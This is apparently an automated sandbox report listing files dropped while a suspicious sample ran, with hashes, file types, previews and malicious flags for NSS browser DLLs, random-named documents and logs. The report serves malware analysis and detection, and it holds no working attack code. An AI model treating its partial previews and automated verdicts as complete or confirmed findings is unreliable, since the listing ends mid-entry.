Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.6.9.1.6.<./.P.i.

C:\ProgramData\Microsoft\Windows\WER\Temp\WERBC64.tmp.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4680
Entropy (8bit):	4.454857792569828
Encrypted:	false
SSDEEP:	48:cvIwWl8zs2Jg77aI9ncWpW8VYrYm8M4JeyFjP+q8vDTamzB4Id:uIjfMI7ZV7VnJ3Kfa2B4Id
MD5:	A3EC0CAE8087E194A3F249800D517CA0
SHA1:	2597F33F27392E9D0C4957887DCDD54509F36E48
SHA-256:	479FD0D3F999E4EF42550378026B3FE3DBAECECDE0B751F974F2C53CE6B5CF0D
SHA-512:	8D6025766A7036536E77C0E8AF1A60A7360ADE92C115D21DDF12BFAB5A8F60C1D1591D3A5A6C5D8EF1DEEA41B42C1F9A65BB7EAC13CF445D9E9B119CC8448A79
Malicious:	false
Preview:	<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="297468" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

C:\ProgramData\NWTVCDUMOB.xlsx

Download File

Process:	C:\Users\user\AppData\Local\Temp\u5c4.0.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.696250160603532
Encrypted:	false
SSDEEP:	24:5Gvoddnzj/gxR0e7uyJ9MLyy07KpRnPgNcnA+2/nSgTfK0Xzy:wv4zCR0ouAMG3wPgNuAZnSQXzy
MD5:	2B6A90B7D410E3A4E2B32C90D816B4FE
SHA1:	B8CD90C4CDCF41CBF18D88A4C01BBA22F670AD83
SHA-256:	D65D483904467EB7373EDA8DFAE2070C057FC93465A4AC5C9FEF8B42340D9DAB
SHA-512:	03AFBF42E5C04E928D03C687B0F17A0AB15428C78958B206DC6C50118B961C9DDF88A6E53B3115F09FDEE44EAFA46B262933164055532D3B4B4F9265F42A6C58
Malicious:	false
Preview:	NWTVCDUMOBTPRQQPHXQLIMGPJXTEMPBNYLBFKQFUEVGISJSVQRMPMZSAYEYQSOTUAJFILXLTKFEVHLSAMYEEFLNJSHLTTFXRTDNUGXEFIGVCAWPMDNUICDIZGPHMESKWSMUPNOFEVXFTSHSKLCVHQTNKDHDMDRJOUTEUSCAUAVMVBMOSYKKRPPZYFUGXFXWMWRACKFCQOUHITLUCHGFZEOIPNCJFJOVBZIKDRNERXOSPKSRMHKTJUGFEOONFWLVNTJWXUFPADWYIUDKAZQXCZRFPUQQAMRTIOEHUDTLGOWYMIDOZAXTLGVEGUCQLJZGMIEQYOLWEMSGZUBWXOIBQEMQLQVGRBTUICFCEJGFTZRZCKJQEMATEONIMJKBYGQYDYXOLLROWXGYCNCVPTMRZSMMSZXKMNPSCJJJKKNRAJXGSLZNKJRJRGMCCCBCIGTLTFKNVDVIHYLGRNXDVIVWBCPNKNIFJAPQQWDQQEDDKNHVJRQJTKCUADORWREEDYTVFAOWHPNXWSNAJCVXCLLTNQPMJQHDILFNQUZJZZJJMMNDNGEBEGSTVAGZJMSMZHWJKNIAFGBUYMVADKCVLDGFQETUZXGUOUWXBBPNOWFERKMKMPOXIOTKJERPVXJGCIUKAGDGITLFYRIBAPKRESMNOMTVTZCXMODUUIGFMEMBMGAGXFZGAAZFCXDWBKKCPUKFFNMVKDFFVZYWKEKBWMADWDZXUIOOLCLIACESGRBJRSMXKUSOKXJEICCPRFWSISDTKVTDVAYSWLRHTWJGCXQMNITQJHCBMSCDRWKMGADWILLATOPVPILEQQGAIPRRUCJFTRRSSWITQKIWJOATZOBETZDBBWAIJIOXCUQSILQHQKEZXWFWWNVEWKZCGFYPBDSDBSFAZDZFRHJBZIGOZCVUGODUTNCDHKKMFHSYKUSFSXOMOUXZYOSUZNJQBXAVPOBTVBINMSIPYONLYRKIHONKWHSUAJWIALOTZAQJSNTIH

C:\ProgramData\SQRKHNBNYN.docx

Download File

Process:	C:\Users\user\AppData\Local\Temp\u5c4.0.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.699088014379539
Encrypted:	false
SSDEEP:	24:iGmuvXb+mVV5Ule86OuFXvk64KaOMJQaJO7tZAWPN4rOnsK:/muvL+mP5Ule86OuraOMJZOHADqf
MD5:	BF469DD8C21F5160EACD49BB59E9A370
SHA1:	2CE4942C6CD2E22A644BAAFAED41DF9D0773477F
SHA-256:	9ECF07708D59E0B3AE33ED553978F4B2BB806B2FB805296F73F9270C4AE01B84
SHA-512:	FBBB805B4C65902C67F2F432BA20FFF689FABDB3652702FA176369107F688C43923C9D729095F313425847E14B138E61117ED6C03E582F82B6426BBC2C481380
Malicious:	false
Preview:	SQRKHNBNYNETDCILWIKLNRYHJZUPCYVTJJKABYYNVEJZBFJGIUZEFUHCOZZISQELZULMAPFIBUSVGGSXSVZRNJXFVUEIKBQNARELKJEJZTEBGXIFTBGDXBSYFJKFICMLOMHZZSIJMPIXZMQULHAZWNOCSCLWTNJMCGVQAOPYTZVRLCKSUPSMWVOFCPJAONGQBPLMQUTZSFYRIBDZWBXIEDJISMCTGTYKEIXWVDVOGMFUNRJDNEGJLVWNACBBGIIRTAHGUMSLSIZNGTRAUGMZTVGLIAKLLKJGKBMXIFPOYCQXJZKJHTLNZGDCLMXTYOBGFAPOQCJGRAKORKGGWPBOJLOZATKDZYFDSONUZOGBFRDBUKZTVYZGXDEWUOXNWHMOIBVOWNWFGBHSDTQQKXWZEHQLAYIXOVZEEZNESKKWITYPIDCMFHTWVHMHFCGNEBNVBSSQHMRSWLHVMAZERIUFTRXEVZHKRXWOMGETJJFBRLFIBRGLAQKLDFZEGHLZSVAMXMNCCUROXGQOMDQJSKUNOGLGYYTVABESIDHASDRACLOFEWGPYLEORXSYDRDGPGOXHIAISBZBDRNVQJXXIBNBXMDSKXPBSCGKGPASGNOIDKIBFJWUIRQHZLXZQVHUEHMHTRDWKGJVQHWFQEBJIBQLDWQHOQLXSPFPLWPYZROYDAQOOOYKTPVFQXLMLRDYSVXVAWCEGVSHGDVSHONQUAVCBBHJRTIJAYXUILHNGHIXFJPJFAUDIJFORYJZHNAXLWYBLWKCVJLUJIGBYGSEWFJFIROQQXBVEJEPGVYKSDGTPKJAXDLAEHUXWDHSNXZPAKHXDOWTIFIVFZHYQJCDKOBOMCFVMEKARJULRZEOXVQKSLPWYLMLCYLKXCIELPAZNPRENTCWPNMFETAJHSENFDLPGHKVHIIHECDTQGWZMNTMEHNJFXFUGFJMWUXXGOIHOBSONRLSITUXOCRFNCIJNPHZABGDPAFATRMRCPXROMUN

C:\ProgramData\SQRKHNBNYN.xlsx

Download File

Process:	C:\Users\user\AppData\Local\Temp\u5c4.0.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.699088014379539
Encrypted:	false
SSDEEP:	24:iGmuvXb+mVV5Ule86OuFXvk64KaOMJQaJO7tZAWPN4rOnsK:/muvL+mP5Ule86OuraOMJZOHADqf
MD5:	BF469DD8C21F5160EACD49BB59E9A370
SHA1:	2CE4942C6CD2E22A644BAAFAED41DF9D0773477F
SHA-256:	9ECF07708D59E0B3AE33ED553978F4B2BB806B2FB805296F73F9270C4AE01B84
SHA-512:	FBBB805B4C65902C67F2F432BA20FFF689FABDB3652702FA176369107F688C43923C9D729095F313425847E14B138E61117ED6C03E582F82B6426BBC2C481380
Malicious:	false
Preview:	SQRKHNBNYNETDCILWIKLNRYHJZUPCYVTJJKABYYNVEJZBFJGIUZEFUHCOZZISQELZULMAPFIBUSVGGSXSVZRNJXFVUEIKBQNARELKJEJZTEBGXIFTBGDXBSYFJKFICMLOMHZZSIJMPIXZMQULHAZWNOCSCLWTNJMCGVQAOPYTZVRLCKSUPSMWVOFCPJAONGQBPLMQUTZSFYRIBDZWBXIEDJISMCTGTYKEIXWVDVOGMFUNRJDNEGJLVWNACBBGIIRTAHGUMSLSIZNGTRAUGMZTVGLIAKLLKJGKBMXIFPOYCQXJZKJHTLNZGDCLMXTYOBGFAPOQCJGRAKORKGGWPBOJLOZATKDZYFDSONUZOGBFRDBUKZTVYZGXDEWUOXNWHMOIBVOWNWFGBHSDTQQKXWZEHQLAYIXOVZEEZNESKKWITYPIDCMFHTWVHMHFCGNEBNVBSSQHMRSWLHVMAZERIUFTRXEVZHKRXWOMGETJJFBRLFIBRGLAQKLDFZEGHLZSVAMXMNCCUROXGQOMDQJSKUNOGLGYYTVABESIDHASDRACLOFEWGPYLEORXSYDRDGPGOXHIAISBZBDRNVQJXXIBNBXMDSKXPBSCGKGPASGNOIDKIBFJWUIRQHZLXZQVHUEHMHTRDWKGJVQHWFQEBJIBQLDWQHOQLXSPFPLWPYZROYDAQOOOYKTPVFQXLMLRDYSVXVAWCEGVSHGDVSHONQUAVCBBHJRTIJAYXUILHNGHIXFJPJFAUDIJFORYJZHNAXLWYBLWKCVJLUJIGBYGSEWFJFIROQQXBVEJEPGVYKSDGTPKJAXDLAEHUXWDHSNXZPAKHXDOWTIFIVFZHYQJCDKOBOMCFVMEKARJULRZEOXVQKSLPWYLMLCYLKXCIELPAZNPRENTCWPNMFETAJHSENFDLPGHKVHIIHECDTQGWZMNTMEHNJFXFUGFJMWUXXGOIHOBSONRLSITUXOCRFNCIJNPHZABGDPAFATRMRCPXROMUN

C:\ProgramData\ZBEDCJPBEY.docx

Download File

Process:	C:\Users\user\AppData\Local\Temp\u5c4.0.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.6994061563025005
Encrypted:	false
SSDEEP:	24:B08PKUcagX20VoXE+FZx/9wb8CokRMdpcUuDdgyzat15b9DZd7:B00KZagXRVyEC/9wbtor+DstLbXR
MD5:	A2EF8D31A8DC8EAFB642142CAE0BDDE5
SHA1:	6D33FA6AE5C8F3D94A889AF2AFBE701A8939BD4A
SHA-256:	A63D52B4D40DE4D08B155AB05F7B239F6B826D2E9AEF65D14C536CC17B117180
SHA-512:	0183DCD7C9808191B0D67319318EDB8069F15943CD9AFFDD5D905CA66471A301A3745EC2BDA93FD30400A08856F9530F8DB8A91555E910534E43591DE6588680
Malicious:	false
Preview:	ZBEDCJPBEYDZQGCVTGMBDASCMXWLERZBJTKXMSCERSGFDONQAMYGDFYKFYLRRNDSSGOWCSVJIWIVRJNDSQXJTTMAXVCSRDVBHJTJAHTUGCUAWHWEVTZMXBFFYFUVEYDCLBXZZXFGQTWOJCECEYXZGEOOJDMVGMJIBYUFGTAXZQFDALIISPEXNBMVCNQHJOUZVXMSFGVMMJSOTYBAIBARXRQIHGTHEJLHLQYVFLCLOFZPJJNGWGUFEFWDITXPCXBOEGYNGVEMPRSJBIUABRWYDIZIOEKFMGKERRXNEAUHHIGKJGZYYHOPIKNRRYEAZLMNYDGFIVIJPYMXKETIZCKXHUZFXIJHQQDRCSLMJZZJXMQYZJYWLCENOBYZRKIPDNTOCZBITNJXYFHPKLDLFNFTFPITPPGJYNAUOBLGWYVHPFDVDMRFKRTPDBLSNIHQBPMARNFKQAQJVIEOLDVNQKQXMHUIECHHCBWWKMSQPKKMTKTWVWEBVUAXWNLNMYEUBMGCGJTOJRQFGGHHLUDCSUNVREFGQLVZNTOMRGHSGVZCIEDGKHHTKATGJQYWMOXACOPMCHXJXNTBTSGCPUUSQVNCDVHCIQKUJWVUTGDNGWDNLQEWLMNYLKNVSFDBBIZZEHCDIMOJGCOBQZDWJNJPIEFNVWHFQSCSHGUQLBIQCMTBTOMPFZRCNWPIJILMFSCYXDRTMSMAVJZZGQJTZZACHQUIBTKCMOKJBPDOKJYCHADHETFJAVZAQIIWZRRGFSBGIIPYXFQSZKQPWXQCYERZGATQXEDAHDYBYZVROOBTIZFDOMRDVIUBHXTQOKCVSRLAYYMSBYFDGLRDCLXUKSNRGYDRFKSMAJGRBMDZLACAAKDZLPQZCVGELWTWVKPXDEMWCSQNQCJWQNLMOGJVDBANJWFKRRBFXUWVSMZLFJYCUJJORXEFPORKQLYKBMUOVWZKWNAHBCKBBJIYVVDQNIPFQZUTPFKYIRDTGOBWONUYXDVC

C:\ProgramData\freebl3.dll

Download File

Process:	C:\Users\user\AppData\Local\Temp\u5c4.0.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	685392
Entropy (8bit):	6.872871740790978
Encrypted:	false
SSDEEP:	12288:4gPbPpxMofhPNN0+RXBrp3M5pzRN4l2SQ+PEu9tUs/abAQb51FW/IzkOfWPO9UN7:4gPbPp9NNP0BgInfW2WMC4M+hW
MD5:	550686C0EE48C386DFCB40199BD076AC
SHA1:	EE5134DA4D3EFCB466081FB6197BE5E12A5B22AB
SHA-256:	EDD043F2005DBD5902FC421EABB9472A7266950C5CBACA34E2D590B17D12F5FA
SHA-512:	0B7F47AF883B99F9FBDC08020446B58F2F3FA55292FD9BC78FC967DD35BDD8BD549802722DE37668CC89EDE61B20359190EFBFDF026AE2BDC854F4740A54649E
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:	Filename: wxfSIz4PAi.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: JHqNlw9U8c.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: QPoX60yhZt.exe, Detection: malicious, Browse Filename: 3R18jv6iGv.exe, Detection: malicious, Browse Filename: YEnIrzZUUw.exe, Detection: malicious, Browse Filename: bUcIhJ4VHm.exe, Detection: malicious, Browse
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........4......p.....................................................@A........................H...S...............x............F..P/.......#................................... ..................@............................text............................... ..`.rdata....... ......................@..@.data...<F...0......................@....00cfg..............................@..@.rsrc...x...........................@..@.reloc...#.......$..."..............@..B........................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\iolo technologies\logs\bootstrap.log

Download File

Process:	C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe
File Type:	ASCII text, with CRLF line terminators
Category:	modified
Size (bytes):	331
Entropy (8bit):	5.170126353678707
Encrypted:	false
SSDEEP:	6:BMKL6WKtaAgrCYbWnmLIYvgBtXSDWwHB1JCsWWm1I0XY4eA:fAaXCYCmkYvgLXSj//K73
MD5:	2D0E0898BD065915FB58CFD2BF2CE8FB
SHA1:	4A0F8D6C463632E120511EA8D1EC099749193CA2
SHA-256:	5D1BF448348F9D453015F7813F75E76EB8296D7A02FF4F61F60E82D162DE33DA
SHA-512:	EA5632C9E2D9C618493CC3A9BD5017C9BE0BDBECB062AFD356EB1D24433A1D11301594185DEA1E8761B48875F2115E4AC755B309BF0E1A2DFDFCC962C213962A
Malicious:	false
Preview:	Bootstrap LogFile..-----------------..[27/04/2024 00:47:01]: Product System Mechanic Determined From 5488CB36-BE62-4606-B07B-2EE938868BD1..[27/04/2024 00:47:01]: This Brand IOLODEFAULT Not Detected As Installed..[27/04/2024 00:47:01]: No Supported Products Were Detected On This System..[27/04/2024 00:47:36]: Telemetry Data Sent..

C:\ProgramData\iolo\logs\WSComm.log

Download File

Process:	C:\Users\user\AppData\Local\Temp\u5c4.3.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	346
Entropy (8bit):	5.179463806662037
Encrypted:	false
SSDEEP:	6:qxTs0TCfk3VotGjZb34Lg/Qilo5f0TCfk3VotGjZb34LRI32Qiloe:ETXVotgOLgoicMTXVotgOLa3fit
MD5:	8BFD43AA3E51FBBF6276F71100EF33AF
SHA1:	2AE6BE9C07DF596E36500B0EDEFFA9AC1A2745EB
SHA-256:	B7B4319061A48D2216F8E26D7DDF4804D0418454F1AB06721D3910B465D79C4A
SHA-512:	D671BA0493AD7977CA2479CFB79F74BD9DAD5BDC9FABA28DBD420D417B31C544D9CDA9FE956C7C05742336AA4A198BDAD621B8F560384DA4386C7F21D100490D
Malicious:	false
Preview:	[04/27/24 00:46:14] PerformGetOrPost : Attempting a POST on http://svc.iolo.com/__svc/sbv/DownloadManager.ashx...[04/27/24 00:46:17] IsValidCommunication : Result := True...[04/27/24 00:46:40] PerformGetOrPost : Attempting a POST on http://svc.iolo.com/__svc/sbv/DownloadManager.ashx...[04/27/24 00:46:41] IsValidCommunication : Result := True...

C:\ProgramData\mozglue.dll

Download File

Process:	C:\Users\user\AppData\Local\Temp\u5c4.0.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	608080
Entropy (8bit):	6.833616094889818
Encrypted:	false
SSDEEP:	12288:BlSyAom/gcRKMdRm4wFkRHuyG4RRGJVDjMk/x21R8gY/r:BKgcRKMdRm4wFkVVDGJVv//x21R8br
MD5:	C8FD9BE83BC728CC04BEFFAFC2907FE9
SHA1:	95AB9F701E0024CEDFBD312BCFE4E726744C4F2E
SHA-256:	BA06A6EE0B15F5BE5C4E67782EEC8B521E36C107A329093EC400FE0404EB196A
SHA-512:	FBB446F4A27EF510E616CAAD52945D6C9CC1FD063812C41947E579EC2B54DF57C6DC46237DED80FCA5847F38CBE1747A6C66A13E2C8C19C664A72BE35EB8B040
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:	Filename: wxfSIz4PAi.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: JHqNlw9U8c.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: QPoX60yhZt.exe, Detection: malicious, Browse Filename: 3R18jv6iGv.exe, Detection: malicious, Browse Filename: YEnIrzZUUw.exe, Detection: malicious, Browse Filename: bUcIhJ4VHm.exe, Detection: malicious, Browse
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........^......................................................j.....@A.........................`...W.....,.... ..................P/...0...A...S..............................h.......................Z.......................text...a........................... ..`.rdata..............................@..@.data...D...........................@....00cfg..............................@..@.tls................................@....rsrc........ ......................@..@.reloc...A...0...B..................@..B................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\msvcp140.dll

Download File

Process:	C:\Users\user\AppData\Local\Temp\u5c4.0.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	450024
Entropy (8bit):	6.673992339875127
Encrypted:	false
SSDEEP:	12288:McPa9C9VbL+3Omy5CvyOvzeOKdqhUgiW6QR7t5s03Ooc8dHkC2esGAWf:McPa90Vbky5CvyUeOKn03Ooc8dHkC2eN
MD5:	5FF1FCA37C466D6723EC67BE93B51442
SHA1:	34CC4E158092083B13D67D6D2BC9E57B798A303B
SHA-256:	5136A49A682AC8D7F1CE71B211DE8688FCE42ED57210AF087A8E2DBC8A934062
SHA-512:	4802EF62630C521D83A1D333969593FB00C9B38F82B4D07F70FBD21F495FEA9B3F67676064573D2C71C42BC6F701992989742213501B16087BB6110E337C7546
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1C.._..._..._.)n...._......._...^."._..^..._..\..._..[..._..Z..._.._..._......_..]..._.Rich.._.........................PE..L.....0].........."!.....(..........`........@......................................,.....@A.........................g.......r...........................A.......=..`x..8............................w..@............p.......c..@....................text....&.......(.................. ..`.data...H)...@.......,..............@....idata.......p.......D..............@..@.didat..4............X..............@....rsrc................Z..............@..@.reloc...=.......>...^..............@..B................................................................................................................................................................................................................................................................

C:\ProgramData\nss3.dll

Download File

Process:	C:\Users\user\AppData\Local\Temp\u5c4.0.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	2046288
Entropy (8bit):	6.787733948558952
Encrypted:	false
SSDEEP:	49152:fECf12gikHlnKGxJRIB+y5nvxnaOSJ3HFNWYrVvE4CQsgzMmQfTU1NrWmy4KoAzh:J7Tf8J1Q+SS5/nr
MD5:	1CC453CDF74F31E4D913FF9C10ACDDE2
SHA1:	6E85EAE544D6E965F15FA5C39700FA7202F3AAFE
SHA-256:	AC5C92FE6C51CFA742E475215B83B3E11A4379820043263BF50D4068686C6FA5
SHA-512:	DD9FF4E06B00DC831439BAB11C10E9B2AE864EA6E780D3835EA7468818F35439F352EF137DA111EFCDF2BB6465F6CA486719451BF6CF32C6A4420A56B1D64571
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................`........................................p......l- ...@A.........................&..........@....P..x...............P/...`..\...................................................\|...\....&..@....................text............................... ..`.rdata..l...........................@..@.data...DR..........................@....00cfg.......@......................@..@.rsrc...x....P......................@..@.reloc..\....`......................@..B........................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\softokn3.dll

Download File

Process:	C:\Users\user\AppData\Local\Temp\u5c4.0.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	257872
Entropy (8bit):	6.727482641240852
Encrypted:	false
SSDEEP:	6144:/yF/zX2zfRkU62THVh/T2AhZxv6A31obD6Hq/8jis+FvtVRpsAAs0o8OqTYz+xnU:/yRzX2zfRkX2T1h/SA5PF9m8jJqKYz+y
MD5:	4E52D739C324DB8225BD9AB2695F262F
SHA1:	71C3DA43DC5A0D2A1941E874A6D015A071783889
SHA-256:	74EBBAC956E519E16923ABDC5AB8912098A4F64E38DDCB2EAE23969F306AFE5A
SHA-512:	2D4168A69082A9192B9248F7331BD806C260478FF817567DF54F997D7C3C7D640776131355401E4BDB9744E246C36D658CB24B18DE67D8F23F10066E5FE445F6
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................P...............................................Sg....@A........................Dv..S....w..........................P/.......5..8q...............................................{...............................text...&........................... ..`.rdata.............................@..@.data................\|..............@....00cfg..............................@..@.rsrc...............................@..@.reloc...5.......6..................@..B........................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\vcruntime140.dll

Download File

Process:	C:\Users\user\AppData\Local\Temp\u5c4.0.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	80880
Entropy (8bit):	6.920480786566406
Encrypted:	false
SSDEEP:	1536:lw2886xv555et/MCsjw0BuRK3jteo3ecbA2W86b+Ld:lw28V55At/zqw+Iq9ecbA2W8H
MD5:	A37EE36B536409056A86F50E67777DD7
SHA1:	1CAFA159292AA736FC595FC04E16325B27CD6750
SHA-256:	8934AAEB65B6E6D253DFE72DEA5D65856BD871E989D5D3A2A35EDFE867BB4825
SHA-512:	3A7C260646315CF8C01F44B2EC60974017496BD0D80DD055C7E43B707CADBA2D63AAB5E0EFD435670AA77886ED86368390D42C4017FC433C3C4B9D1C47D0F356
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......................08e...................................................u............Rich............PE..L...\|.0].........."!.........................................................0.......m....@A.............................................................A... ....... ..8............................ ..@............................................text............................... ..`.data...............................@....idata..............................@..@.rsrc...............................@..@.reloc....... ......................@..B................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\ApplicationInsights\02b7d1436f6e86786e74c7f14b0eeb043810a2ded0b85707d2c8e2ec408053fe\l1vhufo0.vnq

Download File

Process:	C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3::
MD5:	93B885ADFE0DA089CDF634904FD59F71
SHA1:	5BA93C9DB0CFF93F52B521D7420E43F6EDA2784F
SHA-256:	6E340B9CFFB37A989CA544E6BB780A2C78901D3FB33738768511A30617AFA01D
SHA-512:	B8244D028981D693AF7B456AF8EFA4CAD63D282E19FF14942C246E50D9351D22704A802A71C3580B6370DE4CEB293C324A8423342557D4E5C38438F0E36910EE
Malicious:	false
Preview:	.

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\MSBuild.exe.log

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	410
Entropy (8bit):	5.361827289088002
Encrypted:	false
SSDEEP:	12:Q3La/KDLI4MWuPTAq1KDLI4M0kvoDLI4MWuCv:ML9E4KH1qE4jE4Ks
MD5:	812F0A8C671812AA613FC139B69E8614
SHA1:	B4177437C50B25B06FB885362DA36FD171A1C5A9
SHA-256:	6D3DF2C3EA20D3A411078200AFA62DAC6AABA4210C83A2186E80195977BF0F89
SHA-512:	6A82C1F195C66FCC0533B20B8AE9B4F9CEBED6C8D7B450C574E864A60D627F3ABE32081BF65822157716F4672180E19C0DFA91D88663F7FC3CBE7FD0EB36B2EA
Malicious:	false
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\freebl3[1].dll

Download File

Process:	C:\Users\user\AppData\Local\Temp\u5c4.0.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	685392
Entropy (8bit):	6.872871740790978
Encrypted:	false
SSDEEP:	12288:4gPbPpxMofhPNN0+RXBrp3M5pzRN4l2SQ+PEu9tUs/abAQb51FW/IzkOfWPO9UN7:4gPbPp9NNP0BgInfW2WMC4M+hW
MD5:	550686C0EE48C386DFCB40199BD076AC
SHA1:	EE5134DA4D3EFCB466081FB6197BE5E12A5B22AB
SHA-256:	EDD043F2005DBD5902FC421EABB9472A7266950C5CBACA34E2D590B17D12F5FA
SHA-512:	0B7F47AF883B99F9FBDC08020446B58F2F3FA55292FD9BC78FC967DD35BDD8BD549802722DE37668CC89EDE61B20359190EFBFDF026AE2BDC854F4740A54649E
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........4......p.....................................................@A........................H...S...............x............F..P/.......#................................... ..................@............................text............................... ..`.rdata....... ......................@..@.data...<F...0......................@....00cfg..............................@..@.rsrc...x...........................@..@.reloc...#.......$..."..............@..B........................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\mozglue[1].dll

Download File

